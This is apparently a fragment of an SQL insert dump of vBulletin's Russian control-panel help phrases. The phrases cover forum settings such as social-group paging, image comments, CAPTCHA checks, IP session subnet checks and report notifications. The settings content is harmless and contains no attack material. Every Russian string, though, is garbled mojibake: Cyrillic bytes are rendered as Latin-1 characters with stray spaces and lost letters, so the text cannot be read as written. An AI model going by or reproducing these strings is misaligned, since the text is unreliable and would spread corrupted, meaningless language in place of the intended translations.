(22872, -1, 'options_options_externalcount_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò ìà êñèìà ëüÃîå êîëè÷åñòâî çà ïèñåé, êîòîðûå ìîãóò áûòü ïåðåäà Ãû ïðè çà ïðîñå. Ãðåäïîëà ãà åòñÿ, ÷òî ïîëüçîâà òåëü ìîæåò äîáà âèòü ê ññûëêå Ãà RSS ëåÃòó &count=X, ÷òîáû ïîëó÷èòü áîëüøå çà ïèñåé.', 'vbulletin', 'zCarot', 1147890116, '3.6.0 Beta 1'),
(22873, -1, 'options_options_externalcount_title', 'cphelptext', 'Ìà êñèìà ëüÃîå ÷èñëî âÃåøÃèõ çà ïèñåé', 'vbulletin', 'zCarot', 1147890116, '3.6.0 Beta 1'),
(22874, -1, 'options_options_gm_maxperpage_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò âà ì îãðà Ãè÷èòü êîëè÷åñòâî ñîîáùåÃèé, êîòîðîå ïîëüçîâà òåëü ñìîæåò îòîáðà æà òü Ãà îäÃîé ñòðà Ãèöå ñîöèà ëüÃûõ ãðóïï. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå 0.', 'vbulletin', 'zCarot', 1218111741, '3.8.0 Alpha 1'),
(22875, -1, 'options_options_gm_maxperpage_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ñîîáùåÃèé Ãà îäÃó ñòðà Ãèöó', 'vbulletin', 'zCarot', 1218111741, '3.8.0 Alpha 1'),
(22876, -1, 'options_options_gm_perpage_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò âà ì óêà çà òü êîëè÷åñòâî ñîîáùåÃèé, îòîáðà æà åìûõ Ãà îäÃîé ñòðà Ãèöå ñîöèà ëüÃûõ ãðóïï ïî óìîë÷à Ãèþ.\r\n \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå 0.', 'vbulletin', 'zCarot', 1218111708, '3.8.0 Alpha 1'),
(22877, -1, 'options_options_gm_perpage_title', 'cphelptext', 'Êîëè÷åñòâî ñîîáùåÃèé Ãà ñòðà Ãèöó ïî óìîë÷à Ãèþ', 'vbulletin', 'zCarot', 1218111708, '3.8.0 Alpha 1'),
(22878, -1, 'options_options_hvcheck_text', 'cphelptext', 'Äëÿ âûáðà ÃÃûõ äåéñòâèé ôîðóì áóäåò ïðîñèòü ïðîéòè ïðîâåðêó, îòäåëÿþùóþ ëþäåé îò ðîáîòîâ, åñëè äëÿ ãðóïïû ïîëüçîâà òåëåé âêëþ÷åÃî Îòäåëÿòü ëþäåé îò ðîáîòîâ ïðè âûïîëÃÃ¥Ãèè îïðåäåë¸ÃÃûõ äåéñòâèé .', 'vbulletin', 'zCarot', 1216639930, '3.8.0 Alpha 1'),
(22879, -1, 'options_options_hvcheck_title', 'cphelptext', 'Äåéñòâèÿ, ãäå òðåáóåòñÿ îòäåëåÃèå ëþäåé îò ðîáîòîâ', 'vbulletin', 'zCarot', 1216639930, '3.8.0 Alpha 1'),
(22880, -1, 'options_options_ie8render7_text', 'cphelptext', 'ÄîñòóïÃà ÿ Ãà äà ÃÃûé ìîìåÃò âåðñèÿ Microsoft Internet Explorer 8 èìååò ðÿä ïðîáëåì îòîáðà æåÃèÿ ñòðà Ãèö vBulletin. \r\n \r\nÃîçà áîòèâøèñü îá ýòîì, Microsoft ïðåäîñòà âèëà ðà çðà áîò÷èêà ì âîçìîæÃîñòü îòïðà âêè ñïåöèà ëüÃûõ èÃñòðóêöèé äëÿ IE8, ÷òîáû îà îáðà áà òûâà ë ñòðà Ãèöû à Ãà ëîãè÷Ãî IE7. \r\n \r\nÅñëè âû âêëþ÷èòå äà ÃÃóþ îïöèþ, òî îøèáêè îáðà áîòêè ñòðà Ãèö â IE8 èñ÷åçÃóò.', 'vbulletin', 'zCarot', 1205419226, '3.7.0 Release Candidate 1'),
(22881, -1, 'options_options_ie8render7_title', 'cphelptext', 'Ñïåöèà ëüÃûé çà ãîëîâîê äëÿ Internet Explorer 8', 'vbulletin', 'zCarot', 1205419226, '3.7.0 Release Candidate 1'),
(22882, -1, 'options_options_ipcheck_text', 'cphelptext', 'Ãòà îïöèÿ èñïîëüçóåòñÿ äëÿ îïðåäåëåÃèÿ äëèÃû ìà ñêè ïîäñåòè, êîòîðà ÿ áóäåò èñïîëüçîâà òüñÿ äëÿ ïðîâåðêè IP ñåññèè. Ñà ìûé áåçîïà ñÃûé âà ðèà Ãò - êîãäà èä¸ò ïðîâåðêà Ãà òî÷Ãîå ñîîòâåòñòâèå à äðåñà , Ãî ýòî ìîæåò âûçûâà òü ïðîáëåìû ñ Ãåêîòîðûìè ïðîâà éäåðà ìè. Ãîýòîìó ñà ìûé ïðà êòè÷Ãûé âà ðèà Ãò - ïðîâåðÿòü Ãà ñîîòâåòñòâèå äèà ïà çîÃó IP äëèÃîé â 254 à äðåñà .', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22883, -1, 'options_options_ipcheck_title', 'cphelptext', 'Ìà ñêà ïîäñåòè äëÿ ïðîâåðêè IP ñåññèè', 'vbulletin', 'zCarot', 1153754401, '3.6.0 Release Candidate 3'),
(22884, -1, 'options_options_paymentemail_text', 'cphelptext', 'Ââåäèòå ñþäà à äðåñ ýëåêòðîÃÃîé ïî÷òû, Ãà êîòîðûé áóäóò ïðèõîäèòü óâåäîìëåÃèÿ î çà êà çå èëè îòìåÃÃ¥ ïëà òÃîé ïîäïèñêè.', 'vbulletin', 'zCarot', 1147373803, '3.6.0 Beta 1'),
(22885, -1, 'options_options_paymentemail_title', 'cphelptext', 'ÓâåäîìëåÃèå ïî ýëåêòðîÃÃîé ïî÷òå î ïëà òÃîé ïîäïèñêå', 'vbulletin', 'zCarot', 1147373803, '3.6.0 Beta 1'),
(22886, -1, 'options_options_pc_allowed_bbcode_text', 'cphelptext', ' äà ÃÃîé îïöèè, âû ìîæåòå óêà çà òü, êà êèå BB êîäû ìîæÃî áóäåò èñïîëüçîâà òü â êîììåÃòà ðèÿõ ê èçîáðà æåÃèÿì. \r\n \r\nÃî óìîë÷à Ãèþ âêëþ÷åÃû ñëåäóþùèå BB êîäû: îñÃîâÃûå (B, I, U), öâåòà è ññûëîê (URL, EMAIL, THREAD, POST).', 'vbulletin', 'zCarot', 1206966081, '3.7.0 Release Candidate 2'),
(22887, -1, 'options_options_pc_allowed_bbcode_title', 'cphelptext', 'Ãà çðåø¸ÃÃûå BB êîäû â êîììåÃòà ðèÿõ ê èçîáðà æåÃèÿì', 'vbulletin', 'zCarot', 1205422270, '3.7.0 Release Candidate 1'),
(22888, -1, 'options_options_pc_enabled_text', 'cphelptext', 'Âêëþ÷èòå ýòó îïöèþ, åñëè âû æåëà åòå ðà çðåøèòü ïîëüçîâà òåëÿì îñòà âëÿòü êîììåÃòà ðèè ê èçîáðà æåÃèÿì â à ëüáîìà õ.', 'vbulletin', 'zCarot', 1205419881, '3.7.0 Release Candidate 1'),
(22889, -1, 'options_options_pc_enabled_title', 'cphelptext', 'Âêëþ÷èòü êîììåÃòà ðèè ê èçîáðà æåÃèÿì', 'vbulletin', 'zCarot', 1205419881, '3.7.0 Release Candidate 1'),
(22890, -1, 'options_options_pc_maxperpage_text', 'cphelptext', 'Ãòà îïöèÿ âìåñòå ñ \"Êîëè÷åñòâî êîììåÃòà ðèåâ ê èçîáðà æåÃèÿì Ãà îäÃîé ñòðà Ãèöå ïî óìîë÷à Ãèþ\" äà ¸ò âà ì âîçìîæÃîñòü îãðà Ãè÷èòü êîëè÷åñòâî êîììåÃòà ðèåâ, êîòîðîå ìîæåò áûòü îòîáðà æåÃî Ãà îäÃîé ñòðà Ãèöå, êîãäà ïîëüçîâà òåëü ñà ìîñòîÿòåëüÃî èçìåÃèë êîëè÷åñòâî êîììåÃòà ðèåâ Ãà ñòðà Ãèöó. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208955559, '3.7.0 Release Candidate 4'),
(22891, -1, 'options_options_pc_maxperpage_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî êîììåÃòà ðèåâ ê èçîáðà æåÃèÿì Ãà ñòðà Ãèöó', 'vbulletin', 'zCarot', 1205420755, '3.7.0 Release Candidate 1'),
(22892, -1, 'options_options_pc_moderation_text', 'cphelptext', 'Åñëè \"Äà \", òî âñå Ãîâûå êîììåÃòà ðèè ê èçîáðà æåÃèÿì áóäóò îòïðà âëÿòüñÿ Ãà ïðîâåðêó ìîäåðà òîðà ì. \r\n \r\nÅñëè âû æåëà åòå îòïðà âëÿòü Ãà ïðîâåðêó êîììåÃòà ðèè îò îïðåäåë¸ÃÃîé ãðóïïû, òî âîñïîëüçóéòåñü óñòà Ãîâêîé ïðà â ÷åðåç óïðà âëåÃèå ãðóïïà ìè ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1205419979, '3.7.0 Release Candidate 1'),
(22893, -1, 'options_options_pc_moderation_title', 'cphelptext', 'Ãðîâåðêà êîììåÃòà ðèåâ ê èçîáðà æåÃèÿì', 'vbulletin', 'zCarot', 1205419979, '3.7.0 Release Candidate 1'),
(22894, -1, 'options_options_pc_perpage_text', 'cphelptext', 'Åñëè ê èçîáðà æåÃèþ îñòà âëåÃî êîììåÃòà ðèåâ áîëüøå, ÷åì óêà çà ÃÃîå çäåñü ÷èñëî, òî îÃè áóäóò ðà çäåëåÃû Ãà ñòðà Ãèöû, îòîáðà æà ÿ Ãà êà æäîé èç Ãèõ óêà çà ÃÃîå çäåñü êîëè÷åñòâî êîììåÃòà ðèåâ. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208955570, '3.7.0 Release Candidate 4'),
(22895, -1, 'options_options_pc_perpage_title', 'cphelptext', 'Êîëè÷åñòâî êîììåÃòà ðèåâ ê èçîáðà æåÃèÿì Ãà îäÃîé ñòðà Ãèöå ïî óìîë÷à Ãèþ', 'vbulletin', 'zCarot', 1205420637, '3.7.0 Release Candidate 1'),
(22896, -1, 'options_options_pmthrottleperiod_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì óêà çà òü âðåìåÃÃîé ïðîìåæóòîê äëÿ îãðà Ãè÷åÃèÿ êîëè÷åñòâà ëè÷Ãûõ ñîîáùåÃèé, îòïðà âëÿåìûõ ïîëüçîâà òåëåì. Êîëè÷åñòâî ëè÷Ãûõ ñîîáùåÃèé, êîòîðîå ìîæåò áûòü îòïðà âëåÃî çà äà ÃÃûé ïðîìåæóòîê âðåìåÃè, óêà çûâà åòñÿ â ïðà âà õ ãðóïï ïîëüçîâà òåëåé. Åñëè âû óêà æèòå çäåñü 0, òî âðåìåÃÃîå îãðà Ãè÷åÃèå áóäåò ñÃÿòî.', 'vbulletin', 'zCarot', 1220958342, '3.8.0 Alpha 1'),
(22897, -1, 'options_options_pmthrottleperiod_title', 'cphelptext', 'ÂðåìåÃÃîå îãðà Ãè÷åÃèå äëÿ ëè÷Ãûõ ñîîáùåÃèé (â ìèÃóòà õ)', 'vbulletin', 'zCarot', 1220958342, '3.8.0 Alpha 1'),
(22898, -1, 'options_options_postedithistory_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî êà æäîå ñîîáùåÃèå áóäåò ñîõðà ÃÃ¥Ãî, ïðåæäå ÷åì îÃî áóäåò îáÃîâëåÃî. Ãòî ïîçâîëÿåò îòñëåæèâà òü èñòîðèþ ðåäà êòèðîâà Ãèÿ ñîîáùåÃèé. \r\n \r\nÈçìåÃÃ¥Ãèÿ ÃÃ¥ áóäóò çà ïèñà Ãû, åñëè óâåäîìëåÃèå \"ðåäà êòèðîâà ëîñü ...\" ÃÃ¥ îòîáðà æà åòñÿ, ëèáî áûëî èçìåÃÃ¥Ãî. Ãòî ìîæåò ïðîèçîéòè ïî ñëåäóþùèì ïðè÷èÃà ì:\r\n\r\nÃîëüçîâà òåëü, îòðåäà êòèðîâà âøèé ñîîáùåÃèå, Ãà õîäèòñÿ â ãðóïïå, êîòîðà ÿ èìååò òà êèå ïðà âà , ÷òî ïîñëå èõ ðåäà êòèðîâà Ãèÿ ÃÃ¥ îñòà ¸òñÿ óâåäîìëåÃèå î ðåäà êòèðîâà Ãèè ñîîáùåÃèÿ, åñëè îÃè ÃÃ¥ óêà çûâà þò ïðè÷èÃó ðåäà êòèðîâà Ãèÿ. \r\nÑîîáùåÃèå îòðåäà êòèðîâà Ãî î÷åÃü áûñòðî, ñîîòâåòñòâåÃÃî ñðà áîòà ëî óñëîâèå, çà êîòîðîå îòâå÷à åò ïà ðà ìåòð Âðåìÿ äî ïîÿâëåÃèÿ Ãà äïèñè \"ðåäà êòèðîâà ëîñü...\" . \r\n ', 'vbulletin', 'zCarot', 1209725222, '3.7.1'),
(22899, -1, 'options_options_postedithistory_title', 'cphelptext', 'Èñòîðèÿ ðåäà êòèðîâà Ãèÿ ñîîáùåÃèé', 'vbulletin', 'zCarot', 1194883832, '3.7.0 Beta 1'),
(22900, -1, 'options_options_postimagecheck_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî ãîñòè ïåðåä îòïðà âêîé ñîîáùåÃèé äîëæÃû áóäóò ââåñòè òåêñò ñ èçîáðà æåÃèÿ, Ãà êîòîðîì áóäåò ñãåÃåðèðîâà à ñëó÷à éÃûé Ãà áîð áóêâ è öèôð. Ãòî ñäåëà Ãî äëÿ òîãî, ÷òîáû ïîëüçîâà òåëü äîêà çà ë, ÷òî îà ÃÃ¥ à âòîìà òè÷åñêà ÿ ïðîãðà ììà , ðà ññûëà þùà ÿ ñïà ì ïî ôîðóìà ì. ×òîáû äà ÃÃà ÿ îïöèÿ ðà áîòà ëà , PHP äîëæåà èìåòü ïîääåðæêó GD.', 'vbulletin', 'zCarot', 1144866566, '3.6.0 Beta 1'),
(22901, -1, 'options_options_postimagecheck_title', 'cphelptext', 'Ãðîâåðêà èçîáðà æåÃèåì ñîîáùåÃèé îò ãîñòåé', 'vbulletin', 'zCarot', 1144866566, '3.6.0 Beta 1'),
(22902, -1, 'options_options_profileprivacy_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëè ñìîãóò îãðà Ãè÷èâà òü äîñòóï ê Ãåêîòîðûì áëîêà ì è êà òåãîðèÿì èõ ïðîôèëÿ äëÿ îïðåäåë¸ÃÃûõ ïîñåòèòåëåé. \r\nÅñëè âêëþ÷åÃî è ïîëüçîâà òåëü èìååò ïðà âà Ãà èçìåÃÃ¥Ãèå êîÃôèäåÃöèà ëüÃîñòè Ãà óðîâÃÃ¥ ãðóïïû ïîëüçîâà òåëåé, òî îà ñìîæåò ñêðûâà òü Ãåêîòîðûå áëîêè îò ïîëüçîâà òåëåé èç ñâîåãî ñïèñêà èãÃîðèðîâà Ãèÿ; ãîñòåé; ïîëüçîâà òåëåé ÃÃ¥ èç ñïèñêà çÃà êîìûõ; ïîëüçîâà òåëåé ÃÃ¥ èç ñïèñêà äðóçåé. \r\nÃîìÃèòå: Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî äëÿ èçìåÃÃ¥Ãèÿ êîÃôèäåÃöèà ëüÃîñòè ïîëüçîâà òåëÿì ñëåäóåò çà éòè â ñâîé êà áèÃåò è Ãà éòè òà ì ññûëêó \"ÊîÃôèäåÃöèà ëüÃîñòü\".', 'vbulletin', 'zCarot', 1218465512, '3.8.0 Alpha 1'),
(22903, -1, 'options_options_profileprivacy_title', 'cphelptext', 'Ãà çðåøèòü ïîëüçîâà òåëÿì ìåÃÿòü êîÃôèäåÃöèà ëüÃîñòü ïðîôèëÿ', 'vbulletin', 'zCarot', 1218465531, '3.8.0 Alpha 1'),
(22904, -1, 'options_options_profile_album_amount_text', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî à ëüáîìîâ, îòîáðà æà åìûõ â ïðîôèëå ïîëüçîâà òåëÿ', 'vbulletin', 'zCarot', 1195732432, '3.7.0 Beta 1'),
(22905, -1, 'options_options_profile_album_amount_title', 'cphelptext', 'Êîëè÷åñòâî à ëüáîìîâ, îòîáðà æà åìûõ â ïðîôèëå', 'vbulletin', 'zCarot', 1195732432, '3.7.0 Beta 1'),
(22906, -1, 'options_options_remoteyui_text', 'cphelptext', 'Ãî óìîë÷à Ãèþ ñêðèïòû YUI (Yahoo! User Interface Library) õðà Ãÿòñÿ Ãà âà øåì ñåðâåðå, Ãî âû ìîæåòå èñïîëüçîâà òü äëÿ èõ ñåðâèñ CDN (Content Distribution Network), ÷òî ÃåìÃîãî óìåÃüøèò âà ø òðà ôôèê è, âîçìîæÃî, ñÃèçèò âðåìÿ çà ãðóçêè. \r\n\r\nÃòîò ñåðâèñ áåñïëà òÃî ïðåäîñòà âëÿþò Yahoo! è Google. Åñëè äà ÃÃà ÿ îïöèÿ âêëþ÷åÃà , òî ïîëüçîâà òåëè áóäóò ñêà ÷èâà òü ýòè ôà éëû ñ äà ÃÃûõ ñåðâåðîâ. \r\n\r\nÒîëüêî Google ïîääåðæèâà åò ðà ñïðîñòðà ÃÃ¥Ãèå ôà éëîâ ÷åðåç SSL.', 'vbulletin', 'zCarot', 1229602775, '3.8.0 Release Candidate 2'),
(22907, -1, 'options_options_remoteyui_title', 'cphelptext', 'Èñïîëüçîâà òü âÃåøÃþþ YUI', 'vbulletin', 'zCarot', 1193314535, '3.7.0 Beta 1'),
(22908, -1, 'options_options_rpemail_text', 'cphelptext', 'Åñëè âûáðà Ãî óâåäîìëåÃèå ìîäåðà òîðîâ, òî âñå ìîäåðà òîðû ðà çäåëà , â êîòîðîì Ãà õîäèòñÿ ñîîáùåÃèå, Ãà êîòîðîå ïîñòóïèëà æà ëîáà , áóäóò óâåäîìëåÃû î Ãåé. Âû ìîæåòå âûáðà òü òà êæå óâåäîìëåÃèå ñóïåð-ìîäåðà òîðîâ è à äìèÃèñòðà òîðîâ. Åñëè âû âûáåðèòå óâåäîìëåÃèå òîëüêî ìîäåðà òîðîâ, Ãî â ðà çäåëå, â êîòîðîì Ãà õîäèòñÿ ñîîáùåÃèÿ, ìîäåðà òîðû îòñóòñòâóþò, òî ýëåêòðîÃÃîå ïèñüìî áóäåò îòïðà âëåÃî ñóïåð-ìîäåðà òîðà ì è à äìèÃèñòðà òîðà ì.', 'vbulletin', 'zCarot', 1149630634, '3.6.0 Beta 1'),
(22909, -1, 'options_options_rpemail_title', 'cphelptext', 'Îòïðà âêà æà ëîá ïîëüçîâà òåëåé', 'vbulletin', 'zCarot', 1149630634, '3.6.0 Beta 1'),
(22910, -1, 'options_options_rpforumid_text', 'cphelptext', 'Ñèñòåìà æà ëîá Ãà ñîîáùåÃèÿ ïîçâîëÿåò à âòîìà òè÷åñêè ñîçäà âà òü òåìû äëÿ îáñóæäåÃèÿ êà æäîãî òà êîãî ñîîáùåÃèÿ. Êîãäà Ãà îäÃî ñîîáùåÃèå ïîñòóïèëî ñðà çó Ãåñêîëüêî æà ëîá, òî Ãîâûå æà ëîáû äîáà âëÿþòñÿ òà êæå â ýòó òåìó.', 'vbulletin', 'zCarot', 1149630394, '3.6.0 Beta 1'),
(22911, -1, 'options_options_rpforumid_title', 'cphelptext', 'Ãà çäåë äëÿ îáñóæäåÃèÿ æà ëîá', 'vbulletin', 'zCarot', 1149630394, '3.6.0 Beta 1'),
(22912, -1, 'options_options_rpuserid_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî áóäóò ñîçäà âà òüñÿ òåìû äëÿ îáñóæäåÃèÿ æà ëîáû Ãà ñîîáùåÃèå è à âòîðîì ïåðâîãî ñîîáùåÃèÿ áóäåò óêà çà ÃÃûé çäåñü ïîëüçîâà òåëü.  ïðîòèâÃîì ñëó÷à å, åñëè Ãèêòî çäåñü óêà çà à ÃÃ¥ áóäåò, òî òåìû áóäóò ñîçäà âà òüñÿ îò èìåÃè ïîëüçîâà òåëÿ, ñîîáùèâøåãî î ïëîõîì ñîîáùåÃèè.', 'vbulletin', 'zCarot', 1149630500, '3.6.0 Beta 1'),
(22913, -1, 'options_options_rpuserid_title', 'cphelptext', 'Àâòîð òåìû äëÿ îáñóæäåÃèÿ æà ëîá', 'vbulletin', 'zCarot', 1149630500, '3.6.0 Beta 1'),
(22914, -1, 'options_options_sgd_maxperpage_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì îãðà Ãè÷èòü êîëè÷åñòâî äèñêóññèé, îòîáðà æà åìûõ Ãà îäÃîé ñòðà Ãèöå. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå 0.', 'vbulletin', 'zCarot', 1218111573, '3.8.0 Alpha 1'),
(22915, -1, 'options_options_sgd_maxperpage_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî äèñêóññèé Ãà îäÃîé ñòðà Ãèöå', 'vbulletin', 'zCarot', 1218111573, '3.8.0 Alpha 1'),
(22916, -1, 'options_options_sgd_perpage_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì óêà çà òü êîëè÷åñòâî äèñêóññèé, îòîáðà æà åìûõ Ãà îäÃîé ñòðà Ãèöå, ïî óìîë÷à Ãèþ. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå 0.', 'vbulletin', 'zCarot', 1218111598, '3.8.0 Alpha 1'),
(22917, -1, 'options_options_sgd_perpage_title', 'cphelptext', 'Êîëè÷åñòâî äèñêóññèé Ãà ñòðà Ãèöó ïî óìîë÷à Ãèþ', 'vbulletin', 'zCarot', 1218111598, '3.8.0 Alpha 1'),
(22918, -1, 'options_options_sg_allowed_bbcode_text', 'cphelptext', ' äà ÃÃîé îïöèè, âû ìîæåòå óêà çà òü, êà êèå BB êîäû ìîæÃî áóäåò èñïîëüçîâà òü â ñîîáùåÃèÿõ ñîöèà ëüÃûõ ãðóïï.\r\n\r\nÃî óìîë÷à Ãèþ âêëþ÷åÃû ñëåäóþùèå BB êîäû: îñÃîâÃûå (B, I, U), öâåòà è ññûëîê (URL, EMAIL, THREAD, POST).', 'vbulletin', 'zCarot', 1206966090, '3.7.0 Release Candidate 2'),
(22919, -1, 'options_options_sg_allowed_bbcode_title', 'cphelptext', 'Ãà çðåø¸ÃÃûå BB êîäû â ñîîáùåÃèÿõ ãðóïï', 'vbulletin', 'zCarot', 1205424027, '3.7.0 Release Candidate 1'),
(22920, -1, 'options_options_sg_allow_delete_empty_group_text', 'cphelptext', 'Åñëè âêëþ÷åÃî, òî îñÃîâà òåëü ñîöèà ëüÃîé ãðóïïû ñìîæåò â ëþáîé ìîìåÃò óäà ëèòü ñâîþ ãðóïïó, åñëè â Ãåé îòñóòñòâóþò ó÷à ñòÃèêè. Ãòîò ïà ðà ìåòð ÃÃ¥ çà âèñèò îò ïðà â ãðóïïû ïîëüçîâà òåëåé. Åñëè æå âû âûêëþ÷èòå ýòî, òî áóäóò äåéñòâîâà òü ïðà âà ãðóïï ïîëüçîâà òåëåé. \r\n \r\nÅñëè âû âêëþ÷èòå ýòî, òî ïîëüçîâà òåëè ñìîãóò óäà ëèòü ÃåïîïóëÿðÃûå ãðóïïû, Ãî ýòî ìîæåò ïðèâåñòè ê ÃåóäîâëåòâîðèòåëüÃûì ðåçóëüòà òà ì. ÎñÃîâà òåëü ãðóïïû ìîæåò âûãÃà òü âñåõ ïîëüçîâà òåëåé èç ãðóïïû è óäà ëèòü å¸.', 'vbulletin', 'zCarot', 1211899263, '3.7.1'),
(22921, -1, 'options_options_sg_allow_delete_empty_group_title', 'cphelptext', 'Ãà çðåøèòü îñÃîâà òåëÿì óäà ëÿòü ñâîè ñîöèà ëüÃûå ãðóïïû, åñëè îÃè ïóñòûå', 'vbulletin', 'zCarot', 1211899263, '3.7.1'),
(22922, -1, 'options_options_sg_allow_join_to_view_text', 'cphelptext', 'Åñëè âêëþ÷åÃî, òî îñÃîâà òåëè ñîöèà ëüÃûõ ãðóïï ñìîãóò âêëþ÷èòü äëÿ ñâîåé ãðóïïû ôóÃêöèþ \"Âñòóïèòå, ÷òîáû ïðîñìà òðèâà òü\". Ãòî ïðèâåä¸ò ê òîìó, ÷òî òå, êòî ÃÃ¥ ÿâëÿþòñÿ ÷ëåÃà ìè äà ÃÃîé ãðóïïû, ÃÃ¥ ñìîãóò ïðîñìà òðèâà òü å¸ ñîäåðæèìîå (ñîîáùåÃèÿ è èçîáðà æåÃèÿ ãðóïïû). \r\n \r\nÅñëè âû ÃÃ¥ æåëà åòå, ÷òîáû îñÃîâà òåëè ãðóïï ìîãëè óêà çûâà òü òà êîå îãðà Ãè÷åÃèå, òî âûêëþ÷èòå äà ÃÃóþ îïöèþ.', 'vbulletin', 'zCarot', 1205423515, '3.7.0 Release Candidate 1'),
(22923, -1, 'options_options_sg_allow_join_to_view_title', 'cphelptext', 'Ãà çðåøèòü ôóÃêöèþ \"Âñòóïèòå, ÷òîáû ïðîñìà òðèâà òü\"', 'vbulletin', 'zCarot', 1205423515, '3.7.0 Release Candidate 1'),
(22924, -1, 'options_options_sg_allow_owner_mod_queue_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , è îñÃîâà òåëü ãðóïïû èìååò ïðà âî Ãà óïðà âëåÃèå ñîäåðæèìîì ñâîèõ ñîöèà ëüÃûõ ãðóïï , òî îà ñìîæåò âêëþ÷èòü ïðèÃóäèòåëüÃóþ ïðîâåðêó âñåõ ñîîáùåÃèé, îòïðà âëÿåìûõ â ñîöèà ëüÃóþ ãðóïïó. \r\n \r\nÅñëè òà êà ÿ ïðîâåðêà âêëþ÷åÃà , òî ñîîáùåÃèÿ ñîöèà ëüÃûõ ãðóïï ÃÃ¥ áóäóò îòîáðà æà òüñÿ äî òåõ ïîð, ïîêà ÃÃ¥ áóäóò ïðîâåðåÃû îñÃîâà òåëåì ãðóïïû èëè à äìèÃèñòðà öèåé.', 'vbulletin', 'zCarot', 1207560752, '3.7.0 Release Candidate 3'),
(22925, -1, 'options_options_sg_allow_owner_mod_queue_title', 'cphelptext', 'Ãà çðåøèòü ïðèÃóäèòåëüÃóþ ïðîâåðêó ñîîáùåÃèé ãðóïï', 'vbulletin', 'zCarot', 1205423372, '3.7.0 Release Candidate 1'),
(22926, -1, 'options_options_sg_category_cloud_size_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì óêà çà òü êîëè÷åñòâî êà òåãîðèé, êîòîðûå ñëåäóåò îòîáðà æà òü â îáçîðå ñîöèà ëüÃûõ ãðóïï. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå 0.', 'vbulletin', 'zCarot', 1218111503, '3.8.0 Alpha 1'),
(22927, -1, 'options_options_sg_category_cloud_size_title', 'cphelptext', 'Ãà çìåð îáëà êà êà òåãîðèé', 'vbulletin', 'zCarot', 1218111503, '3.8.0 Alpha 1'),
(22928, -1, 'options_options_sg_enablesocialgroupicons_text', 'cphelptext', 'Åñëè âêëþ÷åÃî, òî óïðà âëÿþùèå ñîöèà ëüÃûõ ãðóïï ñìîãóò çà ãðóæà òü èêîÃêó, êîòîðà ÿ áóäåò îòîáðà æà òüñÿ ïðè ïðîñìîòðå ñîöèà ëüÃîé ãðóïïå. \r\n \r\nÃîìÃèòå: ÈêîÃêè ñîöèà ëüÃûõ ãðóïï îãðà Ãè÷åÃû ðà çìåðà ìè èçîáðà æåÃèÿ â 200õ200 ïèêñåëåé.', 'vbulletin', 'zCarot', 1218111803, '3.8.0 Alpha 1'),
(22929, -1, 'options_options_sg_enablesocialgroupicons_title', 'cphelptext', 'Âêëþ÷èòü èêîÃêè ñîöèà ëüÃûõ ãðóïï', 'vbulletin', 'zCarot', 1218111803, '3.8.0 Alpha 1'),
(22930, -1, 'options_options_sg_enable_owner_only_discussions_text', 'cphelptext', 'Åñëè âêëþ÷åÃî è Ãà óðîâÃÃ¥ ãðóïï ïîëüçîâà òåëåé âûäà Ãû ñîîòâåòñòâóþùèå ïðà âà , òî ïîëüçîâà òåëè ñìîãóò ñîçäà âà òü ñîöèà ëüÃûå ãðóïïû, ãäå òîëüêî óïðà âëÿþùèé ñìîæåò Ãà ÷èÃà òü Ãîâûå äèñêóññèè. Îñòà ëüÃûå ïîëüçîâà òåëè âñ¸ åù¸ ñìîãóò îòâå÷à òü â ñóùåñòâóþùèõ äèñêóññèÿõ.', 'vbulletin', 'zCarot', 1210943695, '3.7.1'),
(22931, -1, 'options_options_sg_enable_owner_only_discussions_title', 'cphelptext', 'Äà òü âîçìîæÃîñòü óïðà âëÿþùèì çà ïðåòèòü ñîçäà Ãèå Ãîâûõ äèñêóññèé', 'vbulletin', 'zCarot', 1210943695, '3.7.1'),
(22932, -1, 'options_options_sg_maxperpage_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì îãðà Ãè÷èòü êîëè÷åñòâî ñîöèà ëüÃûõ ãðóïï, îòîáðà æà åìûõ Ãà îäÃîé ñòðà Ãèöå. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå 0.', 'vbulletin', 'zCarot', 1218113753, '3.8.0 Alpha 1'),
(22933, -1, 'options_options_sg_maxperpage_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ãðóïï Ãà îäÃîé ñòðà Ãèöå', 'vbulletin', 'zCarot', 1218113753, '3.8.0 Alpha 1'),
